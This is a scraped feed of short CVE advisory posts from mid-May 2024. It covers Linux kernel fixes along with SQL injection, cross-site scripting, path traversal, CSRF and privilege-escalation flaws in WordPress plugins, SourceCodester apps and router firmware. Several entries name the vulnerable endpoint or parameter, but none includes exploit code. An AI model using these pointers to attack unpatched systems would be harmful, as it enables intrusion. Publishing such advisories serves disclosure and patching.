🚨 CVE-2024-35867In the Linux kernel, the following vulnerability has been resolved:smb: client: fix potential UAF in cifs_stats_proc_show()Skip sessions that are being teared down (status == SES_EXITING) toavoid UAF.🎖@cveNotify |
|
| 2024-05-19 09:37:30 |
🚨 CVE-2024-35865In the Linux kernel, the following vulnerability has been resolved:smb: client: fix potential UAF in smb2_is_valid_oplock_break()Skip sessions that are being teared down (status == SES_EXITING) toavoid UAF.🎖@cveNotify |
|
| 2024-05-19 09:37:26 |
🚨 CVE-2024-35863In the Linux kernel, the following vulnerability has been resolved:smb: client: fix potential UAF in is_valid_oplock_break()Skip sessions that are being teared down (status == SES_EXITING) toavoid UAF.🎖@cveNotify |
|
| 2024-05-19 09:37:25 |
🚨 CVE-2024-35861In the Linux kernel, the following vulnerability has been resolved:smb: client: fix potential UAF in cifs_signal_cifsd_for_reconnect()Skip sessions that are being teared down (status == SES_EXITING) toavoid UAF.🎖@cveNotify |
|
| 2024-05-19 09:37:24 |
🚨 CVE-2024-35860In the Linux kernel, the following vulnerability has been resolved:bpf: support deferring bpf_link dealloc to after RCU grace periodBPF link for some program types is passed as a "context" which can beused by those BPF programs to look up additional information. E.g., formulti-kprobes and multi-uprobes, link is used to fetch BPF cookie values.Because of this runtime dependency, when bpf_link refcnt drops to zerothere could still be active BPF programs running accessing link data.This patch adds generic support to defer bpf_link dealloc callback toafter RCU GP, if requested. This is done by exposing two differentdeallocation callbacks, one synchronous and one deferred. If deferredone is provided, bpf_link_free() will schedule dealloc_deferred()callback to happen after RCU GP.BPF is using two flavors of RCU: "classic" non-sleepable one and RCUtasks trace one. The latter is used when sleepable BPF programs areused. bpf_link_free() accommodates that by checking underlying BPFprogram's sleepable flag, and goes either through normal RCU GP only fornon-sleepable, or through RCU tasks trace GP *and* then normal RCU GP(taking into account rcu_trace_implies_rcu_gp() optimization), if BPFprogram is sleepable.We use this for multi-kprobe and multi-uprobe links, which dereferencelink during program run. We also preventively switch raw_tp link to usedeferred dealloc callback, as upcoming changes in bpf-next tree exposeraw_tp link data (specifically, cookie value) to BPF program at runtimeas well.🎖@cveNotify |
|
| 2024-05-19 08:37:24 |
🚨 CVE-2024-5099A vulnerability was found in SourceCodester Simple Inventory System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updateprice.php. The manipulation of the argument ITEM leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265082 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-19 06:37:24 |
🚨 CVE-2024-5098A vulnerability has been found in SourceCodester Simple Inventory System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-265081 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-19 05:37:24 |
🚨 CVE-2024-22774An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component.🎖@cveNotify |
|
| 2024-05-19 03:37:24 |
🚨 CVE-2024-5097A vulnerability, which was classified as problematic, was found in SourceCodester Simple Inventory System 1.0. Affected is an unknown function of the file /tableedit.php#page=editprice. The manipulation of the argument itemnumber leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265080.🎖@cveNotify |
|
| 2024-05-19 02:37:24 |
🚨 CVE-2024-5095A vulnerability classified as problematic has been found in Victor Zsviot Camera 8.26.31. This affects an unknown part of the component MQTT Packet Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265077 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-18 22:37:25 |
🚨 CVE-2024-28064Kiteworks Totemomail 7.x and 8.x before 8.3.0 allows /responsiveUI/EnvelopeOpenServlet messageId directory traversal for unauthenticated file read and delete operations (with displayLoginChunkedImages) and write operations (with storeLoginChunkedImages).🎖@cveNotify |
|
| 2024-05-18 22:37:24 |
🚨 CVE-2024-28063Kiteworks Totemomail through 7.0.0 allows /responsiveUI/EnvelopeOpenServlet envelopeRecipient reflected XSS.🎖@cveNotify |
|
| 2024-05-18 21:37:24 |
🚨 CVE-2024-36048QAbstractOAuth in Qt Network Authorization in Qt before 5.15.17, 6.x before 6.2.13, 6.3.x through 6.5.x before 6.5.6, and 6.6.x through 6.7.x before 6.7.1 uses only the time to seed the PRNG, which may result in guessable values.🎖@cveNotify |
|
| 2024-05-18 20:37:25 |
🚨 CVE-2024-5094A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This issue affects some unknown processing of the file view_payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265073 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-18 20:37:24 |
🚨 CVE-2024-36043question_image.ts in SurveyJS Form Library before 1.10.4 allows contentMode=youtube XSS via the imageLink property.🎖@cveNotify |
|
| 2024-05-18 19:37:25 |
🚨 CVE-2024-5093A vulnerability has been found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265072.🎖@cveNotify |
|
| 2024-05-18 19:37:24 |
🚨 CVE-2024-34083aiosmptd is a reimplementation of the Python stdlib smtpd.py based on asyncio. Prior to version 1.4.6, servers based on aiosmtpd accept extra unencrypted commands after STARTTLS, treating them as if they came from inside the encrypted connection. This could be exploited by a man-in-the-middle attack. Version 1.4.6 contains a patch for the issue.🎖@cveNotify |
|
| 2024-05-18 16:37:24 |
🚨 CVE-2024-31879IBM i 7.2, 7.3, and 7.4 could allow a remote attacker to execute arbitrary code leading to a denial of service of network ports on the system, caused by the deserialization of untrusted data. IBM X-Force ID: 287539.🎖@cveNotify |
|
| 2024-05-18 13:37:24 |
🚨 CVE-2024-3745MSI Afterburner v4.6.6.16381 Beta 3 is vulnerable to an ACL Bypass vulnerability in the RTCore64.sys driver, which leads to triggering vulnerabilities like CVE-2024-1443 and CVE-2024-1460 from a low privileged user.🎖@cveNotify |
|
| 2024-05-18 12:37:24 |
🚨 CVE-2024-5088The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_id’ parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 10:37:25 |
🚨 CVE-2024-4432The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.4.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 10:37:24 |
🚨 CVE-2024-3658The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.21. This is due to missing authentication checking in the 'set_user_cart' function with the 'user_id' header value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.🎖@cveNotify |
|
| 2024-05-18 08:37:26 |
🚨 CVE-2024-4698The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'show_line_text ' and 'slide_button_hover_animation' parameters in versions up to, and including, 10.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 08:37:25 |
🚨 CVE-2024-2772The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in all versions up to, and including, 5.1.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Fluent Forms settings, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This can be chained with CVE-2024-2771 for a low-privileged user to inject malicious web scripts.🎖@cveNotify |
|
| 2024-05-18 08:37:24 |
🚨 CVE-2024-2771The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.🎖@cveNotify |
|
| 2024-05-18 06:37:26 |
🚨 CVE-2024-4849The WordPress Automatic Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘autoplay’ parameter in all versions up to, and including, 3.94.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 06:37:25 |
🚨 CVE-2024-3811The Salient Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'icon' shortcode in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 06:37:24 |
🚨 CVE-2024-3810The Salient Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.3 via the 'icon' shortcode 'image' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.🎖@cveNotify |
|
| 2024-05-18 05:37:25 |
🚨 CVE-2024-3714The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'give_form' shortcode when used with a legacy form in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 05:37:24 |
🚨 CVE-2024-3437A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /Admin/add-admin.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259631.🎖@cveNotify |
|
| 2024-05-18 03:37:24 |
🚨 CVE-2024-4865The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_id’ parameter in all versions up to, and including, 3.10.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-18 01:07:25 |
🚨 CVE-2021-40655An informtion disclosure issue exists in D-LINK-DIR-605 B2 Firmware Version : 2.01MT. An attacker can obtain a user name and password by forging a post request to the / getcfg.php page🎖@cveNotify |
|
| 2024-05-18 01:07:24 |
🚨 CVE-2014-100005Multiple cross-site request forgery (CSRF) vulnerabilities in D-Link DIR-600 router (rev. Bx) with firmware before 2.17b02 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account or (2) enable remote management via a crafted configuration module to hedwig.cgi, (3) activate new configuration settings via a SETCFG,SAVE,ACTIVATE action to pigwidgeon.cgi, or (4) send a ping via a ping action to diagnostic.php.🎖@cveNotify |
|
| 2024-05-18 00:37:25 |
🚨 CVE-2024-23556SSL/TLS Renegotiation functionality potentially leading to DoS attack vulnerability.🎖@cveNotify |
|
| 2024-05-18 00:37:24 |
🚨 CVE-2024-23554Cross-Site Request Forgery (CSRF) on Session Token vulnerability that could potentially lead to Remote Code Execution (RCE).🎖@cveNotify |
|
| 2024-05-17 23:37:24 |
🚨 CVE-2024-23583An attacker could potentially intercept credentials via the task manager and perform unauthorized access to the Client Deploy Tool on Windows systems.🎖@cveNotify |
|
| 2024-05-17 22:37:26 |
🚨 CVE-2024-35313In Tor Arti before 1.2.3, circuits sometimes incorrectly have a length of 3 (with full vanguards), aka TROVE-2024-004.🎖@cveNotify |
|
| 2024-05-17 22:37:25 |
🚨 CVE-2024-25742In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES.🎖@cveNotify |
|
| 2024-05-17 22:37:24 |
🚨 CVE-2024-25743In the Linux kernel through 6.9, an untrusted hypervisor can inject virtual interrupts 0 and 14 at any point in time and can trigger the SIGFPE signal handler in userspace applications. This affects AMD SEV-SNP and AMD SEV-ES.🎖@cveNotify |
|
| 2024-05-17 13:37:32 |
🚨 CVE-2024-27436In the Linux kernel, the following vulnerability has been resolved:ALSA: usb-audio: Stop parsing channels bits when all channels are found.If a usb audio device sets more bits than the amount of channelsit could write outside of the map array.🎖@cveNotify |
|
| 2024-05-17 13:37:31 |
🚨 CVE-2024-27435In the Linux kernel, the following vulnerability has been resolved:nvme: fix reconnection fail due to reserved tag allocationWe found a issue on production environment while using NVMe over RDMA,admin_q reconnect failed forever while remote target and network is ok.After dig into it, we found it may caused by a ABBA deadlock due to tagallocation. In my case, the tag was hold by a keep alive requestwaiting inside admin_q, as we quiesced admin_q while reset ctrl, so therequest maked as idle and will not process before reset success. Asfabric_q shares tagset with admin_q, while reconnect remote target, weneed a tag for connect command, but the only one reserved tag was heldby keep alive command which waiting inside admin_q. As a result, wefailed to reconnect admin_q forever. In order to fix this issue, Ithink we should keep two reserved tags for admin queue.🎖@cveNotify |
|
| 2024-05-17 13:37:27 |
🚨 CVE-2024-27434In the Linux kernel, the following vulnerability has been resolved:wifi: iwlwifi: mvm: don't set the MFP flag for the GTKThe firmware doesn't need the MFP flag for the GTK, it can even make thefirmware crash. in case the AP is configured with: group cipher TKIP andMFPC. We would send the GTK with cipher = TKIP and MFP which is of coursenot possible.🎖@cveNotify |
|
| 2024-05-17 13:37:26 |
🚨 CVE-2024-27432In the Linux kernel, the following vulnerability has been resolved:net: ethernet: mtk_eth_soc: fix PPE hanging issueA patch to resolve an issue was found in MediaTek's GPL-licensed SDK:In the mtk_ppe_stop() function, the PPE scan mode is not disabled beforedisabling the PPE. This can potentially lead to a hang during the processof disabling the PPE.Without this patch, the PPE may experience a hang during the reboot test.🎖@cveNotify |
|
| 2024-05-17 13:37:25 |
🚨 CVE-2023-52660In the Linux kernel, the following vulnerability has been resolved:media: rkisp1: Fix IRQ handling due to shared interruptsThe driver requests the interrupts as IRQF_SHARED, so the interrupthandlers can be called at any time. If such a call happens while the ISPis powered down, the SoC will hang as the driver tries to access theISP registers.This can be reproduced even without the platform sharing the IRQ line:Enable CONFIG_DEBUG_SHIRQ and unload the driver, and the board willhang.Fix this by adding a new field, 'irqs_enabled', which is used to bailout from the interrupt handler when the ISP is not operational.🎖@cveNotify |
|
| 2024-05-17 13:37:24 |
🚨 CVE-2023-52659In the Linux kernel, the following vulnerability has been resolved:x86/mm: Ensure input to pfn_to_kaddr() is treated as a 64-bit typeOn 64-bit platforms, the pfn_to_kaddr() macro requires that the inputvalue is 64 bits in order to ensure that valid address bits don't getlost when shifting that input by PAGE_SHIFT to calculate the physicaladdress to provide a virtual address for.One such example is in pvalidate_pages() (used by SEV-SNP guests), wherethe GFN in the struct used for page-state change requests is a 40-bitbit-field, so attempts to pass this GFN field directly intopfn_to_kaddr() ends up causing guest crashes when dealing with addressesabove the 1TB range due to the above.Fix this issue with SEV-SNP guests, as well as any similar cases thatmight cause issues in current/future code, by using an inline function,instead of a macro, so that the input is implicitly cast to theexpected 64-bit input type prior to performing the shift operation.While it might be argued that the issue is on the caller side, otherarchs/macros have taken similar approaches to deal with instances likethis, such as ARM explicitly casting the input to phys_addr_t: e48866647b48 ("ARM: 8396/1: use phys_addr_t in pfn_to_kaddr()")A C inline function is even better though.[ mingo: Refined the changelog some more & added __always_inline. ]🎖@cveNotify |
|
| 2024-05-17 13:07:30 |
🚨 CVE-2024-2404The Better Comments WordPress plugin before 1.5.6 does not sanitise and escape some of its settings, which could allow low privilege users such as Subscribers to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-05-17 12:37:43 |
🚨 CVE-2024-27418In the Linux kernel, the following vulnerability has been resolved:net: mctp: take ownership of skb in mctp_local_outputCurrently, mctp_local_output only takes ownership of skb on success, andwe may leak an skb if mctp_local_output fails in specific states; theskb ownership isn't transferred until the actual output routing occurs.Instead, make mctp_local_output free the skb on all error paths up tothe route action, so it always consumes the passed skb.🎖@cveNotify |
|
| 2024-05-17 12:37:42 |
🚨 CVE-2024-27416In the Linux kernel, the following vulnerability has been resolved:Bluetooth: hci_event: Fix handling of HCI_EV_IO_CAPA_REQUESTIf we received HCI_EV_IO_CAPA_REQUEST whileHCI_OP_READ_REMOTE_EXT_FEATURES is yet to be responded assume the remotedoes support SSP since otherwise this event shouldn't be generated.🎖@cveNotify |
|
| 2024-05-17 12:37:41 |
🚨 CVE-2024-27415In the Linux kernel, the following vulnerability has been resolved:netfilter: bridge: confirm multicast packets before passing them up the stackconntrack nf_confirm logic cannot handle cloned skbs referencingthe same nf_conn entry, which will happen for multicast (broadcast)frames on bridges. Example: macvlan0 | br0 / \ ethX ethY ethX (or Y) receives a L2 multicast or broadcast packet containing an IP packet, flow is not yet in conntrack table. 1. skb passes through bridge and fake-ip (br_netfilter)Prerouting. -> skb->_nfct now references a unconfirmed entry 2. skb is broad/mcast packet. bridge now passes clones out on each bridge interface. 3. skb gets passed up the stack. 4. In macvlan case, macvlan driver retains clone(s) of the mcast skb and schedules a work queue to send them out on the lower devices. The clone skb->_nfct is not a copy, it is the same entry as the original skb. The macvlan rx handler then returns RX_HANDLER_PASS. 5. Normal conntrack hooks (in NF_INET_LOCAL_IN) confirm the orig skb.The Macvlan broadcast worker and normal confirm path will race.This race will not happen if step 2 already confirmed a clone. In thatcase later steps perform skb_clone() with skb->_nfct already confirmed (inhash table). This works fine.But such confirmation won't happen when eb/ip/nftables rules dropped thepackets before they reached the nf_confirm step in postrouting.Pablo points out that nf_conntrack_bridge doesn't allow use of statefulnat, so we can safely discard the nf_conn entry and let inet callconntrack again.This doesn't work for bridge netfilter: skb could have a nattransformation. Also bridge nf prevents re-invocation of inet preroutingvia 'sabotage_in' hook.Work around this problem by explicit confirmation of the entry at LOCAL_INtime, before upper layer has a chance to clone the unconfirmed entry.The downside is that this disables NAT and conntrack helpers.Alternative fix would be to add locking to all code parts that deal withunconfirmed packets, but even if that could be done in a sane way thisopens up other problems, for example:-m physdev --physdev-out eth0 -j SNAT --snat-to 1.2.3.4-m physdev --physdev-out eth1 -j SNAT --snat-to 1.2.3.5For multicast case, only one of such conflicting mappings will becreated, conntrack only handles 1:1 NAT mappings.Users should set create a setup that explicitly marks such trafficNOTRACK (conntrack bypass) to avoid this, but we cannot auto-bypassthem, ruleset might have accept rules for untracked traffic already,so user-visible behaviour would change.🎖@cveNotify |
|
| 2024-05-17 12:37:37 |
🚨 CVE-2024-27413In the Linux kernel, the following vulnerability has been resolved:efi/capsule-loader: fix incorrect allocation sizegcc-14 notices that the allocation with sizeof(void) on 32-bit architecturesis not enough for a 64-bit phys_addr_t:drivers/firmware/efi/capsule-loader.c: In function 'efi_capsule_open':drivers/firmware/efi/capsule-loader.c:295:24: error: allocation of insufficient size '4' for type 'phys_addr_t' {aka 'long long unsigned int'} with size '8' [-Werror=alloc-size] 295 | cap_info->phys = kzalloc(sizeof(void *), GFP_KERNEL); | ^Use the correct type instead here.🎖@cveNotify |
|
| 2024-05-17 12:37:36 |
🚨 CVE-2024-27410In the Linux kernel, the following vulnerability has been resolved:wifi: nl80211: reject iftype change with mesh ID changeIt's currently possible to change the mesh ID when theinterface isn't yet in mesh mode, at the same time aschanging it into mesh mode. This leads to an overwriteof data in the wdev->u union for the interface type itcurrently has, causing cfg80211_change_iface() to dowrong things when switching.We could probably allow setting an interface to meshwhile setting the mesh ID at the same time by doing adifferent order of operations here, but realisticallythere's no userspace that's going to do this, so justdisallow changes in iftype when setting mesh ID.🎖@cveNotify |
|
| 2024-05-17 12:37:32 |
🚨 CVE-2024-27409In the Linux kernel, the following vulnerability has been resolved:dmaengine: dw-edma: HDMA: Add sync read before starting the DMA transfer in remote setupThe Linked list element and pointer are not stored in the same memory asthe HDMA controller register. If the doorbell register is toggled beforethe full write of the linked list a race condition error will occur.In remote setup we can only use a readl to the memory to assure the fullwrite has occurred.🎖@cveNotify |
|
| 2024-05-17 12:37:31 |
🚨 CVE-2024-27407In the Linux kernel, the following vulnerability has been resolved:fs/ntfs3: Fixed overflow check in mi_enum_attr()🎖@cveNotify |
|
| 2024-05-17 12:37:30 |
🚨 CVE-2024-27405In the Linux kernel, the following vulnerability has been resolved:usb: gadget: ncm: Avoid dropping datagrams of properly parsed NTBsIt is observed sometimes when tethering is used over NCM with Windows 11as host, at some instances, the gadget_giveback has one byte appended atthe end of a proper NTB. When the NTB is parsed, unwrap call looks forany leftover bytes in SKB provided by u_ether and if there are any pendingbytes, it treats them as a separate NTB and parses it. But in case thesecond NTB (as per unwrap call) is faulty/corrupt, all the datagrams thatwere parsed properly in the first NTB and saved in rx_list are dropped.Adding a few custom traces showed the following:[002] d..1 7828.532866: dwc3_gadget_giveback: ep1out:req 000000003868811a length 1025/16384 zsI ==> 0[002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb toprocess: 1025[002] d..1 7828.532867: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb seq: 0xce67[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x400[002] d..1 7828.532868: ncm_unwrap_ntb: K: ncm_unwrap_ntb ndp_len: 0x10[002] d..1 7828.532869: ncm_unwrap_ntb: K: Parsed NTB with 1 framesIn this case, the giveback is of 1025 bytes and block length is 1024.The rest 1 byte (which is 0x00) won't be parsed resulting in drop ofall datagrams in rx_list.Same is case with packets of size 2048:[002] d..1 7828.557948: dwc3_gadget_giveback: ep1out:req 0000000011dfd96e length 2049/16384 zsI ==> 0[002] d..1 7828.557949: ncm_unwrap_ntb: K: ncm_unwrap_ntb nth: 1751999342[002] d..1 7828.557950: ncm_unwrap_ntb: K: ncm_unwrap_ntb blk_len: 0x800Lecroy shows one byte coming in extra confirming that the byte is comingin from PC: Transfer 2959 - Bytes Transferred(1025) Timestamp((18.524 843 590) - Transaction 8391 - Data(1025 bytes) Timestamp(18.524 843 590) --- Packet 4063861 Data(1024 bytes) Duration(2.117us) Idle(14.700ns) Timestamp(18.524 843 590) --- Packet 4063863 Data(1 byte) Duration(66.160ns) Time(282.000ns) Timestamp(18.524 845 722)According to Windows driver, no ZLP is needed if wBlockLength is non-zero,because the non-zero wBlockLength has already told the function side thesize of transfer to be expected. However, there are in-market NCM devicesthat rely on ZLP as long as the wBlockLength is multiple of wMaxPacketSize.To deal with such devices, it pads an extra 0 at end so the transfer is nolonger multiple of wMaxPacketSize.🎖@cveNotify |
|
| 2024-05-17 12:37:26 |
🚨 CVE-2024-27403In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_flow_offload: reset dst in route object after setting up flowdst is transferred to the flow object, route object does not own itanymore. Reset dst in route object, otherwise if flow_offload_add()fails, error path releases dst twice, leading to a refcount underflow.🎖@cveNotify |
|
| 2024-05-17 12:37:25 |
🚨 CVE-2023-52658In the Linux kernel, the following vulnerability has been resolved:Revert "net/mlx5: Block entering switchdev mode with ns inconsistency"This reverts commit 662404b24a4c4d839839ed25e3097571f5938b9b.The revert is required due to the suspicion it is not good for anythingand cause crash.🎖@cveNotify |
|
| 2024-05-17 10:38:04 |
🚨 CVE-2024-34809Cross-Site Request Forgery (CSRF) vulnerability in Extend Themes EmpowerWP.This issue affects EmpowerWP: from n/a through 1.0.21.🎖@cveNotify |
|
| 2024-05-17 10:38:03 |
🚨 CVE-2024-34807Cross-Site Request Forgery (CSRF) vulnerability in CodeBard Fast Custom Social Share by CodeBard.This issue affects Fast Custom Social Share by CodeBard: from n/a through 1.1.2.🎖@cveNotify |
|
| 2024-05-17 10:38:02 |
🚨 CVE-2024-34806Cross-Site Request Forgery (CSRF) vulnerability in Creative Motion Clearfy Cache.This issue affects Clearfy Cache: from n/a through 2.2.1.🎖@cveNotify |
|
| 2024-05-17 10:37:59 |
🚨 CVE-2024-34756Cross-Site Request Forgery (CSRF) vulnerability in CRM Perks Integration for Contact Form 7 HubSpot.This issue affects Integration for Contact Form 7 HubSpot: from n/a through 1.3.1.🎖@cveNotify |
|
| 2024-05-17 10:37:58 |
🚨 CVE-2024-32960Improper Privilege Management vulnerability in Booking Ultra Pro allows Privilege Escalation.This issue affects Booking Ultra Pro: from n/a through 1.1.12.🎖@cveNotify |
|
| 2024-05-17 10:37:57 |
🚨 CVE-2024-32959Improper Privilege Management vulnerability in Sirv allows Privilege Escalation.This issue affects Sirv: from n/a through 7.2.2.🎖@cveNotify |
|
| 2024-05-17 10:37:56 |
🚨 CVE-2024-32830Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ThemeKraft BuddyForms allows Server Side Request Forgery, Relative Path Traversal.This issue affects BuddyForms: from n/a through 2.8.8.🎖@cveNotify |
|
| 2024-05-17 10:37:52 |
🚨 CVE-2024-32809Unrestricted Upload of File with Dangerous Type vulnerability in JumpDEMAND Inc. ActiveDEMAND allows Using Malicious Files.This issue affects ActiveDEMAND: from n/a through 0.2.41.🎖@cveNotify |
|
| 2024-05-17 10:37:51 |
🚨 CVE-2024-32786Authentication Bypass by Spoofing vulnerability in WP Royal Royal Elementor Addons allows Functionality Bypass.This issue affects Royal Elementor Addons: from n/a through 1.3.93.🎖@cveNotify |
|
| 2024-05-17 10:37:50 |
🚨 CVE-2024-32774Improper Restriction of Excessive Authentication Attempts vulnerability in Metagauss ProfileGrid allows Removing Important Client Functionality.This issue affects ProfileGrid : from n/a through 5.8.2.🎖@cveNotify |
|
| 2024-05-17 10:37:47 |
🚨 CVE-2024-32720Improper Restriction of Excessive Authentication Attempts vulnerability in CodePeople Appointment Hour Booking allows Removing Important Client Functionality.This issue affects Appointment Hour Booking: from n/a through 1.4.56.🎖@cveNotify |
|
| 2024-05-17 10:37:46 |
🚨 CVE-2024-32692Missing Authorization vulnerability in QuanticaLabs Chauffeur Taxi Booking System for WordPress allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Chauffeur Taxi Booking System for WordPress: from n/a through 6.9.🎖@cveNotify |
|
| 2024-05-17 10:37:45 |
🚨 CVE-2024-32807Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Brevo Sendinblue for WooCommerce allows Relative Path Traversal, Manipulating Web Input to File System Calls.This issue affects Sendinblue for WooCommerce: from n/a through 4.0.17.🎖@cveNotify |
|
| 2024-05-17 09:38:01 |
🚨 CVE-2023-50890Improper Privilege Management vulnerability in Brainstorm Force Ultimate Addons for Elementor allows Privilege Escalation.This issue affects Ultimate Addons for Elementor: from n/a through 1.36.20.🎖@cveNotify |
|
| 2024-05-17 09:38:00 |
🚨 CVE-2023-49753Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in spoonthemes Adifier System allows PHP Local File Inclusion.This issue affects Adifier System: from n/a before 3.1.4.🎖@cveNotify |
|
| 2024-05-17 09:37:59 |
🚨 CVE-2023-48757Improper Privilege Management vulnerability in Crocoblock JetEngine allows Privilege Escalation.This issue affects JetEngine: from n/a through 3.2.4.🎖@cveNotify |
|
| 2024-05-17 09:37:56 |
🚨 CVE-2023-48319Improper Privilege Management vulnerability in Salon Booking System Salon booking system allows Privilege Escalation.This issue affects Salon booking system: from n/a through 8.6.🎖@cveNotify |
|
| 2024-05-17 09:37:55 |
🚨 CVE-2023-47782Improper Privilege Management vulnerability in Thrive Themes Thrive Theme Builder allows Privilege Escalation.This issue affects Thrive Theme Builder: from n/a before 3.24.0.🎖@cveNotify |
|
| 2024-05-17 09:37:54 |
🚨 CVE-2023-47682Improper Privilege Management vulnerability in weDevs WP User Frontend allows Privilege Escalation.This issue affects WP User Frontend: from n/a through 3.6.5.🎖@cveNotify |
|
| 2024-05-17 09:37:50 |
🚨 CVE-2023-47178Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in POSIMYTH Innovation The Plus Addons for Elementor Pro allows PHP Local File Inclusion.This issue affects The Plus Addons for Elementor Pro: from n/a through 5.2.8.🎖@cveNotify |
|
| 2024-05-17 09:37:49 |
🚨 CVE-2023-46205Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Brainstorm Force Ultimate Addons for WPBakery Page Builder allows PHP Local File Inclusion.This issue affects Ultimate Addons for WPBakery Page Builder: from n/a through 3.19.14.🎖@cveNotify |
|
| 2024-05-17 09:37:48 |
🚨 CVE-2023-46197Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19.🎖@cveNotify |
|
| 2024-05-17 09:37:44 |
🚨 CVE-2023-45652Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Justin Silver Remote Content Shortcode allows PHP Local File Inclusion.This issue affects Remote Content Shortcode: from n/a through 1.5.🎖@cveNotify |
|
| 2024-05-17 09:37:43 |
